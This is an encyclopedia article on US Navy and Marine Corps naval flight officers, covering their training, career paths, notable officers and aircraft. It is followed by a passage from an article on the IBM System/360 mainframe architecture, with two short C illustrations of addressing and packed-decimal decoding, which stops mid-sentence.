A naval flight officer (NFO) is a commissioned officer in the United States Navy or United States Marine Corps who specializes in airborne weapons and sensor systems. NFOs are not pilots (naval aviators), but they may perform many "co-pilot" functions, depending on the type of aircraft. Until 1966, their duties were performed by both commissioned officer and senior enlisted naval aviation observers (NAO). In 1966, enlisted personnel were removed from naval aviation observer duties but continued to serve in enlisted aircrew roles, while NAO officers received the newly established NFO designation, and the NFO insignia was introduced. NFOs in the US Navy begin their careers as unrestricted line officers (URL), eligible for command at sea and ashore in the various naval aviation aircraft type/model/series (T/M/S) communities and, at a senior level, in command of carrier air wings and aircraft carriers afloat and functional air wings, naval air stations and other activities ashore. They are also eligible for promotion to senior flag rank positions, including command of aircraft carrier strike groups, expeditionary strike groups, joint task forces, numbered fleets, naval component commands and unified combatant commands. A small number of US Navy NFOs have later opted for a lateral transfer to the restricted line (RL) as aeronautical engineering duty officers (AEDO), while continuing to retain their NFO designation and active flight status. Such officers are typically graduates of the U.S. Naval Test Pilot School and/or the U.S. Naval Postgraduate School with advanced academic degrees in aerospace engineering or similar disciplines. AEDO/NFOs are eligible to command test and evaluation squadrons, naval air test centers, naval air warfare centers, and hold major program management responsibilities within the Naval Air Systems Command (NAVAIR). Similarly, Marine Corps NFOs are also considered eligible for command at sea and ashore within Marine aviation, and are also eligible to hold senior general officer positions, such as command of Marine aircraft wings, Marine air-ground task forces (MAGTFs), joint task forces, Marine expeditionary forces, Marine Corps component commands and unified combatant commands. The counterpart to the NFO in the United States Air Force is the combat systems officer (CSO), encompassing the previous roles of navigator, weapon systems officer and electronic warfare officer. Although NFOs in the Navy's E-2 Hawkeye aircraft perform functions similar to the USAF air battle manager in the E-3 Sentry AWACS aircraft, their NFO training track is more closely aligned with that of USAF combat systems officers. The United States Coast Guard had a short-lived NFO community in the 1980s and 1990s when it operated E-2C Hawkeye aircraft on loan from the Navy. Following a fatal mishap with one of these aircraft at the former Naval Station Roosevelt Roads, Puerto Rico, the Coast Guard returned the remaining E-2Cs to the Navy and disestablished its NFO program. Training Overview Training for student NFOs (SNFOs) starts out the same as for student naval aviators (SNAs), with the same academic requirements and nearly identical physical requirements. The only real distinction is in physical requirements: SNFOs may have less than 20/40 uncorrected distance vision. Both SNAs and SNFOs go through the same naval introductory flight evaluation before splitting off into different primary training tracks. The SNFO program has continued to evolve since the 1960s. 
Today, SNFOs train under the Undergraduate Military Flight Officer (UMFO) program at Training Air Wing 6 at NAS Pensacola, alongside foreign students from various NATO, Allied and Coalition navies and air forces. All student NFOs begin primary training at Training Squadron 10 (VT-10), flying the T-6A Texan II trainer, eventually moving on to advanced training at Training Squadron 4 (VT-4) or Training Squadron 86 (VT-86). Upon graduation from their respective advanced squadron, students receive their "wings of gold" and are designated as naval flight officers. After winging, students conduct follow-on training at their respective fleet replacement squadron (FRS). NFO training squadrons Naval Introductory Flight Evaluation All SNFOs and SNAs start their aviation training with naval introductory flight evaluation (NIFE). NIFE consists of several phases: academics, ground school, flight training, and physiology. The academics portion spans three weeks and covers aerodynamics, engines, FAA rules and regulations, navigation, and weather. The academics phase is followed by one week of ground school. Every student then enrolls in one of two civilian flight schools located near NAS Pensacola. Students complete approximately 9 hours of flight training in a single-engine aircraft. NIFE flights can be waived based on proficiency for students entering training with a private pilot license. After the flight phase, students complete training in aerospace physiology, egress, and water and land survival. Primary After completing NIFE, all SNFOs report to VT-10 under Training Air Wing 6 to begin primary training. All training in VT-10 is done in the Beechcraft T-6A Texan II and consists of four phases (all phases consist of ground school, simulator events, and flight events): Familiarization phase (aircraft systems, emergency procedures, basic communication, take-off/landing, ELPs, spins, precision aerobatics, course rules) Instrument phase (instrument flight procedures, flight planning, voice communication) Operational navigation phase (visual flight procedures, tactical route construction, precision aerobatics) Formation phase (ground school and flights used to introduce formation flying, tactical maneuvers, parade sequence, etc.) After graduating from Primary, SNFOs select between multi-crew aviation and strike aviation. Students selected for land-based platforms (e.g., P-3 Orion, P-8 Poseidon, EP-3 Aries II, E-6 Mercury) will continue on to the advanced maritime command and control curriculum at VT-4. Those who select strike aviation remain at VT-10 and continue to Primary 2 training. Primary 2 Primary 2 training is also done through VT-10. It is a much shorter syllabus and consists of two phases: Instrument phase (simulators and flights flown at a faster airspeed and used to bolster instrument procedures) Formation phase After graduating from Primary 2, SNFOs will select: E-2C/D Hawkeye Strike jet aircraft E-2C/D Hawkeye selectees will continue on to the advanced maritime command and control curriculum at VT-4, while jet selectees will continue to Intermediate training and remain at VT-10. Intermediate SNFOs destined for carrier-based strike fighter and electronic attack aircraft remain in VT-10 and continue to fly in the T-6A Texan II. 
Training consists of four phases: Single ship instrument phase (building upon instrument procedures in primary 1 and 2, VFR pattern, GPS navigation) Section instrument phase (instrument flying in formation) Tactical formation phase (rendezvous, tactical formation, tail-chase) Section visual navigation phase (visual navigation flying in formation) Advanced maritime command and control After primary, students who have selected E-2s or land-based maritime aviation (P-3, P-8, EP-3, E-6) check into VT-4 for advanced maritime command and control (MC2) training. The MC2 program was developed to allow SNFOs to receive advanced platform-specific training while still at NAS Pensacola, and to receive their wings before progressing to their respective fleet replacement squadron (FRS) for training in their ultimate operational combat aircraft. All MC2 training is conducted in the Multi-Crew Simulator (MCS), a new simulator system that allows students to train independently, as a single-ship crew, or as a multi-ship mission. MC2 training has two phases: Core and Strand. Core SNFOs begin MC2 training in the "core" syllabus. These classes include a combination of SNFOs who are E-2C/D selectees and land-based maritime selectees. Training in this phase builds upon the instrument training from Primary and includes: Operational flight planning, instruments, and navigation (international flight rules and TACAN navigation) Communications and navigation systems (comm systems and INS, GPS, and RADAR theory and navigation) Sensor and link operations (RADAR, IFF, and IR theory and data link employment) Fleet operations Upon completion of core training, SNFOs who progressed to MC2 training from Primary 1 (land-based maritime selectees) will select their fleet platform. Their choices are: E-6B Mercury, P-3C Orion, EP-3E Aries II, and P-8A Poseidon. When platform selection is complete, all SNFOs remain at VT-4 for "strand" training. Strand Strand training is platform-specific training in VT-4 via the MCS, allowing SNFOs destined for the carrier-based E-2 community or the land-based P-3/P-8, EP-3 and E-6 communities to begin learning their responsibilities on their fleet aircraft. The development of this program relieves the associated fleet replacement squadrons from teaching SNFOs the basics of naval aviation and to focus more on advanced fleet tactics, thus providing the fleet with mission-capable NFOs. Upon completion of strand training, students receive their "wings of gold" and are aeronautically designated as naval flight officers. SNFOs progress through one or two of four strands, depending on what platform they select. The E-2 strand consists of: Airborne early warning (E-2 capabilities and mission overview) Air intercept control (airborne battlefield command and control, tactics, and strike techniques) The common navigation strand consists of: Publications and charts Overwater navigation and communication procedures Navigation logs The MPR strand consists of: Surface search and littoral surveillance (community overview, target identification, sensor employment) Electronic warfare and acoustic operations (EW introduction, sonar theory) Maritime patrol and reconnaissance (coordinated operations) The E-6 strand consists of: Communications and operations (community overview, operations, strategic command structure) Advanced strike SNFOs report to VT-86 and fly the T-45C Goshawk. 
Training consists of five phases: Contact phase (T-45 systems, emergency procedures, carrier operations, night operations, communications) Strike phase (air-to-ground radar, low level flying, mission planning, fuel awareness) Close air support phase (CAS procedures and communications) Basic fighter maneuver phase (BFM practice) All weather intercepts phase (air-to-air radar, air intercepts, GPS) After graduating from advanced strike training, Navy SNFOs will select: EA-18G Growler F/A-18F Super Hornet Marine SNFOs will select: F/A-18D Hornet Comparison with naval aviators Naval flight officers operate some of the advanced systems on board most multi-crew naval aircraft, and some may also act as the overall tactical mission commanders of single or multiple aircraft assets during a given mission. NFOs are not trained to pilot the aircraft, although they do train in some dual-control aircraft and are given the opportunity to practice "hands on controls" basic airmanship techniques. Some current and recently retired naval aircraft with side-by-side seating are also authorized to operate under dual-piloted weather minimums with one pilot and one NFO. However, in the unlikely event that the pilot of a single-piloted naval aircraft becomes incapacitated, the crew would likely eject or bail out, if possible, as NFOs are not qualified to land the aircraft, especially in the carrier-based shipboard environment. NFOs serve as weapon systems officers (WSOs), electronic warfare officers (EWOs), electronic countermeasures officers (ECMOs), tactical coordinators (TACCOs), bombardiers, and navigators. They can serve as aircraft mission commanders, although in accordance with the OPNAVINST 3710 series of instructions, the pilot in command, regardless of rank, is always responsible for the safe piloting of the aircraft. Many NFOs achieve flight/section lead, division lead, package lead, mission lead and mission commander qualification, even when the pilot of the aircraft does not have that designation. Often, a senior NFO is paired with a junior pilot (and vice versa). NFO astronauts have also flown aboard the Space Shuttle and the International Space Station as mission specialists and wear NFO-astronaut wings. Like their naval aviator counterparts, NFOs in both the Navy and Marine Corps have commanded aviation squadrons, carrier air wings, shore-based functional air wings and air groups, marine aircraft groups, air facilities, air stations, aircraft carriers, amphibious assault ships, carrier strike groups, expeditionary strike groups, Marine aircraft wings, Marine expeditionary forces, numbered fleets, and component commands of unified combatant commands. Three NFOs have reached four-star rank, one as a Marine Corps general having served as the Assistant Commandant of the Marine Corps, and the other two as Navy admirals, one having served as Vice Chief of Naval Operations before commanding U.S. Fleet Forces Command and U.S. Atlantic Fleet, U.S. Pacific Command (USPACOM) and U.S. Central Command (USCENTCOM), and the other having commanded U.S. Pacific Command, having previously commanded U.S. Pacific Fleet. Another former NFO who retrained and qualified as a Naval Aviator also achieved four-star rank as a Marine Corps general, commanded U.S. Strategic Command (USSTRATCOM) and later served as Vice Chairman of the Joint Chiefs of Staff (VCJCS). In some quarters, NFO careers may be viewed as more restrictive than those of their Naval Aviator (i.e., pilot) counterparts. 
For example, NFOs only serve aboard multi-crew naval aircraft and as certain multi-crew aircraft are retired from the active inventory, NFOs can become displaced, as happened with the withdrawal of the A-6, EA-6B, F-4, F-14 and S-3 from active service. In addition, as avionics have become more advanced, the need for some multi-crew aircraft using one or more NFOs has been reduced. However, the majority of NFOs (as well as Naval Aviators) from aircraft being retired have historically been afforded the opportunity to transition to another aircraft platform, such as F-4 and F-14 transitions to the F/A-18D and F/A-18F, A-6 transitions to the EA-6B and S-3, S-3 transitions to the P-3/P-8, E-2 and F/A-18F, and EA-6B transitions to the EA-18G. Although it is true that Naval Aviators can also transition their piloting expertise into civilian careers as commercial airline pilots and that NFOs are not able to similarly translate their skills into this career field unless augmented by associated FAA pilot certificates, the military aviation career opportunities of NFOs remain on par with their Naval Aviator counterparts, as do their post-military career prospects in the civilian sector in defense, aviation & aerospace, as well as other career pursuits beyond that of commercial airline pilot. Notable NFOs Vice Admiral Walter E. "Ted" Carter Jr. became the 62nd superintendent of the U.S. Naval Academy on July 23, 2014. He graduated from the U.S. Naval Academy in 1981, was designated a Naval Flight Officer in 1982, and graduated from the U.S. Navy Fighter Weapons School (TOPGUN) in 1985. Carter's career as an aviator includes extensive time at sea, deploying around the globe in the F-4 Phantom II and the F-14 Tomcat. He has landed on 19 different aircraft carriers, to include all 10 of the Nimitz class carriers. Carter flew 125 combat missions in support of joint operations in Bosnia, Kosovo, Kuwait, Iraq and Afghanistan. He accumulated 6,150 flight hours in F-4, F-14, and F/A-18 aircraft during his career and safely completed 2,016 carrier-arrested landings, the record among all active and retired U.S. Naval Aviation designators. As a captain, Vice Admiral Richard Dunleavy was the first NFO to command an aircraft carrier, the (CV 43). He previously flew the A-3 Skywarrior, A-5 Vigilante, RA-5C Vigilante and A-6 Intruder. Later in his career, he was promoted to rear admiral and vice admiral, and was the first NFO to hold the since disestablished position of Deputy Chief of Naval Operations for Air Warfare (OP-05). He retired in 1993. Rear Admiral Stanley W. Bryant was the first NFO selected for the Navy's Nuclear Power Program as a Commander in 1986. As a Captain, he became the first NFO to command a nuclear aircraft carrier when he took command of U.S.S. Theodore Roosevelt (CVN 71) in July 1992. In his first posting following promotion to Flag rank, he became the first NFO and first carrier aviator to command the Iceland Defense Force in Keflavik, Iceland in 1994. He was the first NFO appointed to the position of Deputy Commander (then DCINC), Naval Forces Europe and retired from that position in 2001. Commander William P. Driscoll was the first NFO to become a flying ace, having achieved five aerial kills of VPAF fighter aircraft during the Vietnam War. Driscoll received the service's second-highest decoration, the Navy Cross, for his role in a 1972 dogfight with North Vietnamese MiGs. 
Driscoll separated from active duty in 1982 but remained in the United States Naval Reserve, flying the F-4 Phantom II and later the F-14 Tomcat in a Naval Air Reserve fighter squadron at NAS Miramar, eventually retiring in 2003 with the rank of Commander (O-5). Admiral William Fallon, an NFO who flew in the RA-5C Vigilante and the A-6 Intruder, was the first NFO to achieve four-star rank. As a three-star vice admiral, he was the first NFO to command a numbered fleet, the U.S. 2nd Fleet. He later served in four separate four-star assignments, to include command of two unified combatant commands. This included service as the 31st Vice Chief of Naval Operations from October 2000 to August 2003; the Commander, U.S. Fleet Forces Command and U.S. Atlantic Fleet from October 2003 to February 2005; Commander, U.S. Pacific Command (USPACOM) from February 2005 until March 2007; and Commander, U.S. Central Command (USCENTCOM) from March 2007 until his retirement in March 2008. Captain Dale Gardner was the first NFO to qualify and fly as a NASA Mission Specialist astronaut aboard the Space Shuttle Challenger on mission STS-8. He previously flew the F-14 Tomcat. He retired in 1990. Rear Admiral Benjamin Thurman Hacker was the first NFO flag officer, having been selected in 1980. He previously flew the P-2 Neptune and P-3 Orion. He retired in 1988. Admiral Harry B. Harris, Jr., was the last Commander, U.S. Pacific Command (USPACOM) prior to its re-designation as U.S. Indo-Pacific Command (USINDOPACOM). He was the first NFO from the land-based maritime patrol aviation community to command a numbered fleet, the U.S. 6th Fleet, and later commanded the U.S. Pacific Fleet. He is also the first member of the Navy's land-based maritime patrol aviation community, pilot or NFO, to promote to four-star rank. He previously flew the P-3C Orion and retired in 2018. Vice Admiral David C. Nichols was the deputy coalition air forces component commander (deputy CFACC) during Operation Enduring Freedom and Operation Iraqi Freedom. He was the first NFO to command the Naval Strike and Air Warfare Center, the second NFO to command a numbered fleet, the U.S. 5th Fleet, and was later deputy commander of U.S. Central Command. He previously flew the A-6 Intruder and retired in 2007. General William L. Nyland, USMC was the first Marine Corps NFO to achieve four-star rank as Assistant Commandant of the Marine Corps. As a lieutenant general, he was also the first NFO to serve as deputy commandant for aviation. He previously flew the F-4 Phantom II and the F/A-18 Hornet. He retired in 2005. Lieutenant General Terry G. Robling, USMC was the first Marine Corps NFO to command United States Marine Corps Forces, Pacific following an assignment as the deputy commandant for aviation. He previously flew the F-4 Phantom II and the F/A-18 Hornet. He retired in 2014. Vice Admiral Nora W. Tyson was the Commander, United States Third Fleet from 2015 to 2017, and previously Deputy Commander, U.S. Fleet Forces Command. She was the first female NFO to command a warship, the amphibious assault ship (LHD 5), and the first female naval officer to command an aircraft carrier strike group, Carrier Strike Group Two, aboard the (CVN 77). She previously flew the land-based EC-130Q Hercules and the E-6 Mercury TACAMO aircraft. She was the first woman to command a U.S. Navy fleet, the U.S. 3rd Fleet. She retired in 2017. Colonel John C. Church, Sr., USMC (Ret.) was the first NFO to command a Marine F-4 squadron. 
He commanded VMFA 115, the Silver Eagles, from 1983 to 1984. Colonel Church, "the Silver Fox", had served with VMFA 115 during the Vietnam War, when he and his pilot Captain James "Rebel" Denton were shot down. Colonel Church amassed more than 500 missions in the F-4. Fleet Eligible fleet platforms for NFOs as of December 2017 are as follows: E-2C/D Hawkeye F/A-18F Super Hornet F/A-18D Hornet (USMC only) EA-18G Growler EP-3E Aries II P-3C Orion P-8A Poseidon E-6B Mercury In the EA-18G Growler, NFOs are designated as electronic warfare officers (EWOs) and may also be mission commanders. In the E-2C Hawkeye and E-2D Advanced Hawkeye, NFOs are initially designated as radar officers (RO), then upgrade to air control officers (ACO) and finally to combat information center officers (CICO) and CICO/mission commanders (CICO/MC). In the E-6B Mercury, NFOs are initially designated as airborne communications officers (ACOs), then upgrade to combat systems officers (CSOs), and finally to mission commanders (CSO/MC). In the EP-3E Aries, NFOs are initially designated as navigators (NAV) and eventually upgrade to electronic warfare officer/signals evaluator (EWO SEVAL) and EWO/SEVAL/mission commander (SEVAL/MC). In the F/A-18F Super Hornet and F/A-18D Hornet, the NFO position is known as the weapon systems officer (WSO) and may also be mission commander qualified. In the P-3C Orion and P-8A Poseidon, the NFO is initially designated as a navigator/communicator (NAV/COM) and eventually upgrades to tactical coordinator (TACCO) and then TACCO/mission commander (TACCO/MC). A single USN or USMC NFO is assigned to the United States Navy Flight Demonstration Squadron, the Blue Angels, as "Blue Angel #8", the Events Coordinator. This is an operational flying billet for this officer and he or she flies the twin-seat F/A-18D "Blue Angel 7" aircraft (which replaced the F/A-18B previously used) with the team's advance pilot/narrator. They function as the advance liaison (ADVON) at all air show sites and the events coordinator provides backup support to the narrator during all aerial demonstrations. NFOs have also served as instructors in the twin-seat F-5F Tiger II at the Navy Fighter Weapons School (now part of the Naval Aviation Warfighting Development Center (NAWDC)) and as instructors in twin-seat F/A-18Bs in USN and USMC F/A-18 fleet replacement squadrons and the Navy Fighter Weapons School. They have also flown a number of USAF and NATO/Allied aircraft via the U.S. Navy's Personnel Exchange Program (PEP), including, but not limited to, the USAF F-4 Phantom II, F-15E Strike Eagle and E-3 Sentry, the Royal Air Force Buccaneer S.2, Tornado GR1/GR1B/GR4/GR4A and Nimrod MR.2, and the Royal Canadian Air Force CP-140 Aurora. In all, the specific roles filled by an NFO can vary greatly depending on the type of aircraft and squadron to which an NFO is assigned. Past aircraft NFOs also flew in these retired aircraft, including as mission commander: EA-1F (formerly AD-5Q) Skyraider serving as electronic warfare officer/electronic countermeasures operator. A-3 (formerly A3D) Skywarrior (e.g., A-3B, EA-3B, ERA-3B, EKA-3B, TA-3B and VA-3B) serving as bombardier/navigator, navigator, electronic countermeasures/electronic warfare officer, and EWO signals evaluator. A-4 Skyhawk as students in the TA-4J, as TOPGUN adversary instructors in the TA-4F and TA-4J, as forward air controllers in the OA-4M (USMC only), and as electronic warfare officers in the EA-4F. 
A-5A (formerly A3J-1), A-5B (formerly A3J-2) and RA-5C (formerly A3J-3P) Vigilante serving as bombardier/navigator in the A-5A and A-5B and reconnaissance/attack navigator in the RA-5C. A-6 Intruder (e.g., A-6A, A-6B, A-6C, KA-6D, A-6E) serving as bombardier/navigator (USN + USMC). EA-6A Prowler serving as electronic countermeasures officer (USN + USMC). EA-6B Prowler serving as electronic countermeasures officer (USN + USMC). EA-7L Corsair II as electronic countermeasures officer. C-130F Hercules serving as navigator. EC-130Q Hercules "TACAMO" aircraft serving as navigator and airborne communications officer. LC-130 Hercules serving as navigator. E-1B (formerly WF-2) Tracer serving as radar intercept controllers. EC-121 (formerly WV-2 and WV-3) Warning Star as navigator and electronic warfare officer. EF-10 (formerly F3D-2Q) Skyknight as electronic warfare officer (USMC only). F-4 Phantom II (e.g., F-4B, F-4J, F-4N, F-4S, EF-4B, EF-4J) serving as radar intercept officer (USN + USMC). EF-4B and EF-4J Phantom II serving as electronic warfare officer. RF-4B Phantom II serving as reconnaissance systems officer (USMC only). F-14 Tomcat (e.g., F-14A, F-14B, F-14D) serving as radar intercept officer. OV-10 Bronco (OV-10A, OV-10D, OV-10D+, OV-10G) serving as aerial observer and forward air controller (USMC only). SP-2E/H (formerly P2V-5 and P2V-7) Neptune (e.g., SP-2E, SP-2H, EP-2E, OP-2E, AP-2H, LP-2H) serving as tactical coordinator and navigator. SP-5B (formerly P5M) Marlin serving as tactical coordinator and navigator. RP-3A and RP-3D Orion serving as ocean project coordinator and navigator. S-3 Viking (S-3A and S-3B) serving as tactical coordinator (TACCO) and co-pilot/tactical coordinator (COTAC). ES-3A Shadow serving as electronic warfare officer and co-pilot/electronic warfare officer. WP-3A Orion serving as navigator. EP-3J Orion serving as navigator and electronic warfare officer. P-3A, P-3B and P-3B TACNAVMOD Orion serving as tactical coordinator and navigator. NFOs have also served as instructors/mission commanders in since-retired training aircraft such as the UC-45 Expeditor, T-29 Flying Classroom, several variants of the T-39 Sabreliner, the TC-4C Academe, T-47A Citation II and the USAF T-43A Bobcat. Popular culture One of the key characters in the popular film Top Gun was LTJG Nick "Goose" Bradshaw, played by Anthony Edwards, an F-14 radar intercept officer (RIO) teamed with his pilot, LT Pete "Maverick" Mitchell, played by Tom Cruise. Several others were LTJG Ron "Slider" Kerner, RIO to LT Tom "Iceman" Kazansky; LT Sam "Merlin" Neills, LT Bill "Cougar" Cortell's RIO; and LTJG Leonard "Wolfman" Wolfe, LT Rick "Hollywood" Neven's RIO. LTJG Marcus "Sundown" Williams (played by Clarence Gilyard Jr.) is the RIO of LTJG Charles "Chipper" Piper (played by Adrian Pasdar) and served as Maverick's RIO right after the latter went back to operational flight status following the accident that led to Goose's death. In the film Flight of the Intruder, Willem Dafoe played LCDR Virgil "Tiger" Cole, who served as an A-6 B/N (bombardier/navigator) with his pilot, LT Jake "Cool Hand" Grafton, played by Brad Johnson. In the film Behind Enemy Lines, Owen Wilson played LT Chris Burnett, a weapon systems officer in an F/A-18F Super Hornet. 
See also Naval aviator insignia United States Marine Corps aviation List of United States Navy aircraft squadrons List of United States Marine Corps aircraft squadrons NATOPS Notes References United States naval aviation Combat occupations United States Navy job titles
28739443
https://en.wikipedia.org/wiki/IBM%20System/360%20architecture
IBM System/360 architecture
The IBM System/360 architecture is the model independent architecture for the entire S/360 line of mainframe computers, including but not limited to the instruction set architecture. The elements of the architecture are documented in the IBM System/360 Principles of Operation and the IBM System/360 I/O Interface Channel to Control Unit Original Equipment Manufacturers' Information manuals. Features The System/360 architecture provides the following features: 16 32-bit general-purpose registers 4 64-bit floating-point registers 64-bit program status word (PSW), which includes a 24-bit instruction address 24-bit (16 MB) byte-addressable memory space Big-endian byte/word order A standard instruction set, including fixed-point binary arithmetic and logical instructions, present on all System/360 models (except the Model 20, see below). A commercial instruction set, adding decimal arithmetic instructions, is optional on some models, as is a scientific instruction set, which adds floating-point instructions. The universal instruction set includes all of the above plus the storage protection instructions and is standard for some models. The Model 44 provides a few unique instructions for data acquisition and real-time processing and is missing the storage-to-storage instructions. However, IBM offered a "Commercial Instruction Set" feature that ran in bump storage and simulated the missing instructions. The Model 20 offers a stripped-down version of the standard instruction set, limited to eight general registers with halfword (16-bit) instructions only, plus the commercial instruction set, and unique instructions for input/output. The Model 67 includes some instructions to handle 32-bit addresses and "dynamic address translation", with additional privileged instructions to provide virtual memory. Memory Memory (storage) in System/360 is addressed in terms of 8-bit bytes. Various instructions operate on larger units called halfword (2 bytes), fullword (4 bytes), doubleword (8 bytes), quadword (16 bytes) and 2,048-byte storage block, specifying the leftmost (lowest address) byte of the unit. Within a halfword, fullword, doubleword or quadword, low numbered bytes are more significant than high numbered bytes; this is sometimes referred to as big-endian. Many uses for these units require aligning them on the corresponding boundaries. Within this article the unqualified term word refers to a fullword. The original architecture of System/360 provided for up to 2^24 = 16,777,216 bytes of memory. The later Model 67 extended the architecture to allow up to 2^32 = 4,294,967,296 bytes of virtual memory. Addressing System/360 uses truncated addressing similar to that of the UNIVAC III. That means that instructions do not contain complete addresses, but rather specify a base register and a positive offset from the addresses in the base registers. In the case of System/360 the base address is contained in one of 15 general registers. In some instructions, for example shifts, the same computations are performed for 32-bit quantities that are not addresses. Data formats The S/360 architecture defines formats for characters, integers, decimal integers and hexadecimal floating point numbers. Character and integer instructions are mandatory, but decimal and floating point instructions are part of the Decimal arithmetic and Floating-point arithmetic features. Characters are stored as 8-bit bytes. Integers are stored as two's complement binary halfword or fullword values. 
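As an illustration of the addressing scheme just described, the following C sketch (hypothetical helper names; the S/360 manuals define no C API) computes an effective address from a base register and a displacement and fetches a big-endian fullword. The 4-bit base field and 12-bit displacement split is the standard S/360 instruction layout, and a base field of 0 means that no base is added, which is why only 15 of the 16 general registers can serve as bases.

```c
#include <stdint.h>

/* Effective address = contents of the base register plus a 12-bit
 * displacement, truncated to the 24-bit address space described above.
 * Base field 0 means "no base register".                               */
static uint32_t effective_address(const uint32_t gpr[16],
                                  unsigned base, unsigned displacement)
{
    uint32_t addr = displacement & 0xFFF;        /* 12-bit displacement  */
    if (base != 0)
        addr += gpr[base];
    return addr & 0x00FFFFFF;                    /* 24-bit (16 MB) space */
}

/* Fetch a big-endian fullword: the lower-addressed bytes are the most
 * significant, as described in the Memory section.                     */
static uint32_t fetch_fullword(const uint8_t *storage, uint32_t addr)
{
    return ((uint32_t)storage[addr]     << 24) |
           ((uint32_t)storage[addr + 1] << 16) |
           ((uint32_t)storage[addr + 2] <<  8) |
            (uint32_t)storage[addr + 3];
}
```

For RX-format instructions (described below), the contents of the specified index register would also be added before the truncation to 24 bits.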
Packed decimal numbers are stored as 1 to 16 8-bit bytes containing an odd number of decimal digits followed by a 4-bit sign. Sign values of hexadecimal A, C, E, and F are positive and sign values of hexadecimal B and D are negative. Digit values of hexadecimal A-F and sign values of 0-9 are invalid, but the PACK and UNPK instructions do not test for validity. Zoned decimal numbers are stored as 1 to 16 8-bit bytes, each containing a zone in bits 0-3 and a digit in bits 4-7. The zone of the rightmost byte is interpreted as a sign. Floating point numbers are stored only as fullword or doubleword values on older models. On the 360/85 and 360/195 there are also extended precision floating point numbers stored as quadwords. For all three formats, bit 0 is a sign and bits 1-7 are a characteristic (exponent, biased by 64). Bits 8-31 (8-63) are a hexadecimal fraction. For extended precision, the low order doubleword has its own sign and characteristic, which are ignored on input and generated on output. Instruction formats Instructions in the S/360 are two, four or six bytes in length, with the opcode in byte 0. Instructions have one of the following formats: RR (two bytes). Generally byte 1 specifies two 4-bit register numbers, but in some cases, e.g., SVC, byte 1 is a single 8-bit immediate field. RS (four bytes). Byte 1 specifies two register numbers; bytes 2-3 specify a base and displacement. RX (four bytes). Bits 0-3 of byte 1 specify either a register number or a modifier; bits 4-7 of byte 1 specify the number of the general register to be used as an index; bytes 2-3 specify a base and displacement. SI (four bytes). Byte 1 specifies an immediate field; bytes 2-3 specify a base and displacement. SS (six bytes). Byte 1 specifies two 4-bit length fields or one 8-bit length field; bytes 2-3 and 4-5 each specify a base and displacement. The encoding of the length fields is length-1. Instructions must be on a two-byte boundary in memory; hence the low-order bit of the instruction address is always 0. Program Status Word (PSW) The Program Status Word (PSW) contains a variety of controls for the currently operating program. The 64-bit PSW describes (among other things) the address of the next instruction to be executed, the condition code and the interrupt masks. Load Program Status Word (LPSW) is a privileged instruction that loads the Program Status Word (PSW), including the program mode, protection key, and the address of the next instruction to be executed. LPSW is most often used to "return" from an interruption by loading the "old" PSW which is associated with the interruption class. Other privileged instructions (e.g., SSM, STNSM, STOSM, SPKA, etcetera) are available for manipulating subsets of the PSW without causing an interruption or loading a PSW; and one non-privileged instruction (SPM) is available for manipulating the program mask. Interruption system The architecture defines 5 classes of interruption. An interruption is a mechanism for automatically changing the program state; it is used for both synchronous and asynchronous events. There are two storage fields assigned to each class of interruption on the S/360; an old PSW doubleword and a new PSW doubleword. The processor stores the PSW, with an interruption code inserted, into the old PSW location and then loads the PSW from the new PSW location. This generally replaces the instruction address, thereby effecting a branch, and (optionally) sets and/or resets other fields within the PSW, thereby effecting a mode change. 
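The packed decimal format described at the start of this section can be sketched with a short C routine (hypothetical helper, not from any IBM source): successive nibbles hold the digits, and the low nibble of the last byte holds the sign, with A, C, E and F positive and B and D negative. Fields longer than 18 digits would overflow a 64-bit integer and are not handled in this sketch.

```c
#include <stdint.h>
#include <stdbool.h>

/* Decode a packed decimal field of 'len' bytes (1 to 16) into a signed
 * 64-bit value.  Returns false on an invalid digit or sign, roughly the
 * situation the hardware reports as a data exception.                  */
static bool decode_packed(const uint8_t *field, unsigned len, int64_t *out)
{
    int64_t value = 0;

    for (unsigned i = 0; i < len; i++) {
        unsigned hi = field[i] >> 4;
        unsigned lo = field[i] & 0x0F;

        if (hi > 9)                     /* every high nibble is a digit  */
            return false;
        value = value * 10 + hi;

        if (i + 1 < len) {              /* low nibble is a digit ...     */
            if (lo > 9)
                return false;
            value = value * 10 + lo;
        } else {                        /* ... except in the last byte,  */
            if (lo < 0xA)               /* where it is the sign          */
                return false;
            if (lo == 0xB || lo == 0xD) /* B and D are negative          */
                value = -value;
        }                               /* A, C, E and F are positive    */
    }
    *out = value;
    return true;
}
```

For example, the two-byte field 12 3D decodes to -123, while 12 3C decodes to +123.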
The S/360 architecture defines a priority to each interruption class, but it is only relevant when two interruptions occur simultaneously; an interruption routine can be interrupted by any other enabled interruption, including another occurrence of the initial interruption. For this reason, it is normal practice to specify all of the mask bits, with the exception of the machine-check mask bit, as 0 for the "first-level" interruption handlers. "Second-level" interruption handlers are generally designed for stacked interruptions (multiple occurrences of interruptions of the same interruption class). Input/Output interruption An I/O interruptionPoOps occurs at the completion of a channel program, after fetching a CCW with the PCI bit set, and also for asynchronous events detected by the device, control unit or channel, e.g., completion of a mechanical movement. The system stores the device address into the interruption code and stores channel status into the CSW at location 64 ('40'X). Program interruption A Program interruption occurs when an instruction encounters one of 15 exceptions; however, if the Program Mask bit corresponding to an exception is 0 then there is no interruption for that exception. On 360/65, 360/67 and 360/85 the Protection Exception and Addressing Exception interruptions can be imprecise, in which case they store an Instruction Length Code of 0. The Interruption code may be any of the following: An operation exceptionPoOps is recognized when a program attempts to execute an instruction with an opcode that the computer does not implement. In particular, an operation exception is recognized when a program is written for an optional feature, e.g., floating point, that is not installed. A privileged operation exceptionPoOps is recognized when a program attempts to execute a privileged instruction when the problem state bit in the PSW is 1. An execute exceptionPoOps is recognized when the operand of an EXECUTE instruction (EX) is another EXECUTE instruction. A protection exceptionPoOps is recognized when a program attempts to store into a location whose storage protect key does not match the PSW key, or to fetch from a fetch protected location whose storage protect key does not match the PSW key. An addressing exceptionPoOps is recognized when a program attempts to access a storage location that is not currently available. This normally occurs with an address beyond the capacity of the machine, but it may also occur on machines that allow blocks of storage to be taken offline. A specification exceptionPoOps is recognized when an instruction has a length or register field with values not permitted by the operation, or when it has an operand address that does not satisfy the alignment requirements of the opcode, e.g., an LH instruction with an odd operand address on a machine without the byte alignment feature. A data exceptionPoOps is recognized when a decimal instruction specifies invalid operands, e.g., invalid data, invalid overlap. A fixed-point overflow exceptionPoOps is recognized when significant bits are lost in a fixed point arithmetic or shift instruction, other than divide. A fixed-point divide exceptionPoOps is recognized when significant bits are lost in a fixed point divide or Convert to Binary instruction. A decimal 